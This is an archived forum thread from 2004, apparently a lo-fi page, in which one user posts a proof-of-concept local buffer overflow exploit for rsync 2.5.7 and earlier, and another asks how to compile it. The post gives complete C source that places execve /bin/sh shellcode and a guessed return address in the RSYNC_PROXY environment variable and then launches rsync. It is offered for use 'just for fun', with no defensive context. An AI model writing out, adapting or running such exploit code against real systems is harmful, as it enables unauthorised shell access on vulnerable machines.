GaLiaRePt
Feb 24 2004, 06:20 PM
Rsync Buffer Overflow (RSYNC_PROXY Environment Variable) Exploit Date: 2004-02-24
Author : DownBload < downbload@hotmail.com>
Download :
http://www.security-corporation.com/download/exploit/rsync.c | CODE |
/*
This is just a lame PoC rsync < = 2.5.7 local buffer overflow (no root)
exploit.
Tested on RH 7.3
- Coded (in 5 minutes) by DownBload < downbload@hotmail.com>
*/
#include < stdio.h>
#include < stdlib.h>
unsigned long get_esp() { __asm__ ("movl %esp, %eax\n"); }
char linux_x86_execve[]=
"\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80:";
main (int argc, char **argv)
{
unsigned long ret;
char buffer[512];
int offset=1500; ? ?// for RH 7.3
int dist=76;
if (argc == 2) offset = atoi(argv[1]);
memset (buffer,0x90,sizeof(buffer));
memcpy (buffer+400, linux_x86_execve, strlen(linux_x86_execve));
ret = get_esp() + offset;
printf ("RET: 0x%x\n", ret);
*(long*)&buffer[400+strlen(linux_x86_execve)+dist] = ret;
setenv("RSYNC_PROXY",buffer,1);
execl ("/usr/bin/rsync","rsync",(char*)"localhost::", NULL);
} |
Just for fun as well ;-)
invisible-boy
Feb 24 2004, 07:59 PM
hi
where compile it?
i can't compile it in Redhat linux???
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
